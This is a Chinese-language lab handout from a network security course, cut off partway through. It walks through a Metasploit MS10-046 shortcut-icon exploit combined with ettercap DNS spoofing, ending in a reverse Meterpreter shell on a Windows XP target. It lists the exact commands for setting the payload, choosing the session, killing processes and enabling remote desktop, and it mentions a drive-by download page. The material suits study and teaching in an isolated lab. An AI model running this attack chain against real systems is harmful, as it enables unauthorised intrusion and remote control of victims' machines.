利用漏洞进行溢出攻击及数据备份1.实训目的(后果自负)利用系统漏洞进行溢出攻击是一种现今网络上常用的一种攻击手段,它利用C等高级语言对于数据、指针以及寄存器等保护不足及程序员在开发系统时的过错,通过多重手段屏蔽用户感知,从而获取用户所传递信息或者误导用户的网络应用操作。本次练习主要目的是体验利用漏洞进行缓冲区溢出攻击。数据备份是系统管理员日常进行系统、数据维护所必需掌握的技巧及手段,本次练习应用windows2003自带的备份工具进行数据备份。2.实训所需条件及环境硬件设备:局域网(含机柜、配线架、交换机等)、台式PC机软件支撑:Windows2003、WindowsXP以及BackTract5虚拟机网络拓扑结构:3.实训内容3.1利用metasploit进行溢出攻击练习①使用metasploit开启攻击首先是进入Metasploit。可以点击【应用程序】→【BackTrack】→【ExploitationTools】→【NetworkExploitationTools】→【MetasploitFramewrok】进入Metasploit外,也可以在图形界面下打开任意一个终端,直接输入msfconsole命令来进入Metasploit。此时可以看到当前包含代码数量、参数状态及最新版本等,如下图所示,进入msf的工作平台后,输入searchms10-046查询攻击代码的存放路径,即可看到名为"ms10_046_shortcut_icon_dllloader"的相关信息。接下来,使用如下指令载入攻击代码:Usewindows/browser/ms10_046_shortcut_icon_dllloader回车后如下图所示,表示载入攻击代码成功。此时,可以通过showoptions来查看可以(必需)进行的参数配置。在了解需进行的攻击参数的配置后,接下来就可以使用set命令来依次配置参数。其中,还需设置PAYLOAD为获取windows的shellcode,即windows/metepreter/reverse_tcp。此外,由于后面攻击还要使用ettercap对目标进行DNS欺骗攻击,所以要将反弹端口的目的地设置为自身IP,即设置LHOST为自身IP。具体命令如下:setSRVHOST攻击者自身IPsetPAYLOADwindows/meterpreter/reverse_tcpsetLHOST攻击者自身IPexploit②进行dns欺骗攻击参照在欺骗攻击练习中的操作叙述及练习视频的说明,完成对etter.dns的配置。注意这里域名对应的ip地址必需根据自己的机器的实际ip地址进行。完成域名的配置后,使用ifconfig查看使用的网络适配器的符号,然后发起欺骗攻击,如下图所示。③入侵目标主机目标主机(WindowsXP)上打开浏览器,输入网址http://www.xxx并回车,会发现浏览器的响应会变得缓慢。稍等数秒后,会发现在目标主机上的浏览器上原本应显示为www.xxx的主页,突然变成了一个名为\\192.168.60.130\XHJnSkKNjR的共享目录。如下图所示。打开攻击主机BackTrack5的Metasploit终端下,会看到目标主机因DNS欺骗而导致的重定向访问,此时目标主机被强制运行了攻击主机即192.168.60.130上Metasploit执行的漏洞攻击代码。于是在成功溢出后,攻击主机拿到了一个反向溢出Shell。如下图所示,即可获取到一个MeterpreterSession(注意倒数第三行)。此时,攻击者输入back命令回到Metasploit的根目录后,就可以使用sessions查看这个反向溢出Shell的ID号及其相关信息,然后再调用该ID即可。具体命令如下:sessionssessions-i1参数解释:-inum该参数用于调用不同ID号的成功溢出Shell,后跟的num为ID号。依次输入上述命令,就可以成功调用该反向溢出Shell,此时会看到提示符从"msf"变成了"meterpreter",如下图所示,此时键入ps即可看到目标主机所有运行的进程。④攻击操作练习目标主机打开计算器,如下图所示,请你使用linux的kill指令将计算器的进程杀除。使用命令rungetgui–e,看看能否开启目标主机的运程管理服务。3.2挂马攻击练习开启windows2003,并运行IIS服务。然后使用如下指令,设计挂马网页。修改3.1中的dns配置,将域名对应的ip地址指向windows2003,并重复3.1的整个攻击过程。看看在目标机器上,能否察觉被攻击机入侵的痕迹??3.3数据备份练习①实验环境准备启动windows2003(以下简称主机),并配置IIS服务器。然后复制默认网站工作目录下的所...
VIP
